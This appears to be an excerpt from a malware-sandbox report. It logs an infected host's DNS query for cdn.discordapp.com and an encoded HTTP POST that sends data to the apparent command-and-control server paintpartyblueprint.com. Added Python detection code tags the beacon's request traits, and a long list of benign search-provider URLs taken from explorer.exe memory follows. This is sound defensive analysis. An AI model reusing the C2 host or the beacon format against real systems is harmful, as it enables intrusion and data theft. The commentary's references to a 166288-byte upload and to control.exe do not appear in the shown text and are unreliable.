Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown | HTTP traffic detected:
  POST /3nop/ HTTP/1.1
  Host: www.paintpartyblueprint.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.paintpartyblueprint.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.paintpartyblueprint.com/3nop/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 73 50 58 4c 4d 54 3d 6c 66 34 79 39 38 6f 57 64 6b 78 71 4d 44 43 76 65 77 77 59 68 56 6f 38 6d 35 39 45 5a 2d 65 6a 63 70 65 6b 31 4f 42 33 65 55 4b 51 63 6c 49 4f 47 4a 36 4f 4e 52 33 52 58 49 56 65 31 59 31 6f 50 77 33 71 6b 35 33 73 50 61 43 37 67 61 6a 4b 44 4c 4c 76 76 31 4c 2d 76 39 4e 47 76 79 79 66 72 71 59 65 73 64 32 66 75 6e 6c 46 6c 51 43 73 5a 35 54 6e 77 48 33 6d 38 45 38 44 64 73 64 37 34 61 39 79 66 4f 72 34 6a 58 38 2d 35 52 50 6c 72 51 4b 77 74 53 6f 52 73 4d 49 30 31 57 78 68 45 52 61 6e 79 54 61 62 72 4e 45 4d 49 4f 78 32 56 34 6b 77 69 30 4f 62 42 65 52 64 58 54 4b 6c 52 6e 4a 48 38 64 36 35 4f 4a 53 4d 57 30 31 59 77 46 55 31 35 69 77 70 49 66 28 78 57 52 55 47 6b 48 57 7a 48 73 75 50 73 39 51 33 46 44 63 68 4c 42 6e 6b 78 4c 78 31 55 2d 72 55 48 73 41 78 59 2d 61 61 56 42 45 4c 50 52 55 47 6a 46 50 78 33 69 70 74 4b 42 67 42 56 62 48 4f 55 4d 31 34 30 4c 54 74 6f 6c 57 68 4a 75 54 61 54 6e 7e 7a 36 4a 5a 55 6a 72 46 32 56 6b 59 62 32 56 39 49 44 4e 58 5f 55 48 36 5a 73 42 79 67 61 6c 6b 33 62 46 41 4a 4c 50 77 53 50 57 64 39 63 4a 58 56 70 37 70 6e 79 45 74 6a 6e 56 4e 73 45 57 78 45 46 45 7a 56 51 38 4e 36 6e 55 6d 71 35 6c 52 75 34 6c 46 38 38 6f 79 5f 6b 67 36 65 4c 5f 71 4f 38 41 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: sPXLMT=lf4y98oWdkxqMDCvewwYhVo8m59EZ-ejcpek1OB3eUKQclIOGJ6ONR3RXIVe1Y1oPw3qk53sPaC7gajKDLLvv1L-v9NGvyyfrqYesd2funlFlQCsZ5TnwH3m8E8Ddsd74a9yfOr4jX8-5RPlrQKwtSoRsMI01WxhERanyTabrNEMIOx2V4kwi0ObBeRdXTKlRnJH8d65OJSMW01YwFU15iwpIf(xWRUGkHWzHsuPs9Q3FDchLBnkxLx1U-rUHsAxY-aaVBELPRUGjFPx3iptKBgBVbHOUM140LTtolWhJuTaTn~z6JZUjrF2VkYb2V9IDNX_UH6ZsBygalk3bFAJLPwSPWd9cJXVp7pnyEtjnVNsEWxEFEzVQ8N6nUmq5lRu4lF88oy_kg6eL_qO8A).
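The requests above show the beaconing shape that matters for network detection: a GET to /3nop/ whose query carries one long parameter (sPXLMT=...) and a short second one, sent with no User-Agent at all; then POSTs to the same path with a browser-like Trident/7.0 User-Agent, Origin and Referer pointing back at the same host and path, Connection: close on every request, and a form-encoded body whose single field has the same name as the GET query parameter. The 166288-byte POST is the exfiltration upload. The explorer.exe strings that follow (search-engine and favicon URLs in the 00000005.00000000 snapshot) are Internet Explorer search-provider data resident in explorer.exe's own memory, not indicators; the C2 evidence is the paintpartyblueprint.com traffic. As an added example, not part of the report, the Python below parses raw request text and tags these traits; the two requests are rebuilt from the headers shown on the page with the POST body cut short, and the trait names are mine.

```python
"""Beacon-shape checks over the C2 requests listed above (added example).

Not part of the report. The two requests are rebuilt from the headers shown on
the page; the POST body is cut after its first characters (so Content-Length no
longer matches, and the code never trusts it). The trait names are mine.
"""
from urllib.parse import parse_qsl, urlsplit

GET_REQ = (
    "GET /3nop/?sPXLMT=t90IjdgfDENVc0T1Dnlw8jEGtrxzOKCpJZWtpo0gR2G0NWwGMYr6NEOXU6tP9KcCJTWz&Mvdl=2d28 HTTP/1.1\r\n"
    "Host: www.paintpartyblueprint.com\r\n"
    "Connection: close\r\n"
    "\r\n"
)

POST_REQ = (
    "POST /3nop/ HTTP/1.1\r\n"
    "Host: www.paintpartyblueprint.com\r\n"
    "Connection: close\r\n"
    "Content-Length: 412\r\n"
    "Cache-Control: no-cache\r\n"
    "Origin: http://www.paintpartyblueprint.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "Referer: http://www.paintpartyblueprint.com/3nop/\r\n"
    "Accept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
    "sPXLMT=lf4y98oWdkxqMDCvewwYhVo8m59EZ-ejcpek1OB3eUKQclIOGJ6ONR3RXIVe1Y1oPw3qk53sPaC7gajKDLLvv1L"  # truncated
)


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: method, path, query pairs, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {
        "method": method,
        "path": url.path,
        "query": parse_qsl(url.query, keep_blank_values=True),
        "headers": headers,
        "body": body,
    }


def request_traits(req: dict) -> set:
    """Per-request traits seen in the report's traffic."""
    traits = set()
    h = req["headers"]
    if req["method"] == "GET" and "user-agent" not in h:
        traits.add("get_without_user_agent")
    if h.get("connection", "").lower() == "close":
        traits.add("connection_close")
    if req["method"] == "POST":
        origin, referer = h.get("origin"), h.get("referer")
        if origin and referer and referer == origin + req["path"]:
            traits.add("referer_is_origin_plus_path")
        if h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
            traits.add("form_post")
        if "Trident/7.0" in h.get("user-agent", ""):
            traits.add("ie11_trident_user_agent")
    return traits


def pair_traits(get_req: dict, post_req: dict) -> set:
    """Traits that only show up when the GET and the POST are looked at together."""
    traits = set()
    if get_req["path"] == post_req["path"]:
        traits.add("same_path")
    get_keys = [k for k, _ in get_req["query"]]
    post_keys = [k for k, _ in parse_qsl(post_req["body"], keep_blank_values=True)]
    if get_keys and post_keys and get_keys[0] == post_keys[0]:
        traits.add("post_field_matches_get_param")
    return traits


def score_beacon_pair(get_raw: str, post_raw: str) -> list:
    """Sorted trait list for a GET/POST pair to the same host."""
    g, p = parse_request(get_raw), parse_request(post_raw)
    return sorted(request_traits(g) | request_traits(p) | pair_traits(g, p))


if __name__ == "__main__":
    print(score_beacon_pair(GET_REQ, POST_REQ))
```

None of these traits is conclusive on its own; the value is in the combination (a bare GET probe, then a form POST to the same path whose field name repeats the GET parameter, with a self-referencing Referer and Connection: close throughout) and in joining it to process context: the report attributes this traffic to control.exe, which is not a browser regardless of what User-Agent it sends.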
Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000005.00000000.294770647.000000000EAD1000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
